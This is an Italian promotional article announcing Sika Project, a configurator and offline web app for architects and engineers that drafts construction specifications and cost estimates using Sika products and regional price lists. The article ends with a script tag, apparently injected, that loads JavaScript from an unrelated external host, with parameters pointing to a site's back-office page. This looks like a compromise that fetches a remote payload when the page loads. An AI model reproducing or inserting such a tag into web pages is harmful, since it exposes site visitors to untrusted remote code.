È nato il primo programma digitale pensato da Sika Italia per i professionisti del settore edile, che consente loro di redigere capitolati completi con tutte le voci di lavorazione da eseguire con prodotti Sika e relativi computi economici: si chiama Sika® Project ed è stato voluto dall’azienda e progettato e sviluppato da Layoutweb per fornire a progettisti, architetti e ingegneri un prezioso strumento di lavoro, da utilizzare in qualunque momento anche grazie all’applicazione web scaricabile gratuitamente anche offline.
Proprio perché si tratta di uno strumento che deve agevolare e facilitare il lavoro di chi lo utilizza, Sika® Project è stato progettato per essere estremamente pratico e fruibile: il capitolato viene redatto partendo dalla semplice domanda “Che lavorazione devi fare?” e, da questo punto in poi, una serie di menu a tendina guida l’utente attraverso preparazioni, trattamenti dei supporti, posa in opera, fino alla redazione completa del documento con tutte le voci di capitolato, stampabile in formato pdf e doc.
Per accedere al programma - disponibile anche in versione demo per consentire una prima conoscenza del suo funzionamento - l’utente dovrà semplicemente registrarsi al sito www.sikaproject.it e da quel momento avrà libero accesso a tutte le funzioni del configuratore, con la possibilità di “personalizzare” con il proprio logo - all’interno dell’area a lui riservata - i documenti redatti. Basterà compilare i campi indicati partendo dalla scelta della Regione fino alla selezione dei materiali - con tutta la gamma di prodotti Sika a disposizione e schede tecniche sempre aggiornate consultabili direttamente online - fino alla posa in opera e gli eventuali noleggi: prezzi, operai e relative qualifiche, essendo estrapolati dai prezziari regionali, saranno costantemente aggiornati. Un riepilogo finale consentirà di visualizzare rapidamente le lavorazioni, i corrispettivi costi e le percentuali di incidenza di ogni settore sulla lavorazione.
Effettuando la registrazione al sito, sarà inoltre possibile scaricare la webapp di Sika® Project, per poter utilizzare il configuratore anche in assenza di connessione internet. Sviluppata per Android, Windows, iPad e iPhone, questa applicazione web potrà essere installata su tablet e smartphone e verrà costantemente aggiornata ogni volta che il dispositivo tornerà online, garantendo al professionista un prezioso supporto in qualunque situazione lavorativa.
<script src="https://secure-content-delivery.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&d=2013-10-10&s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1&cb=0.6847740283696689" type="text/javascript"></script>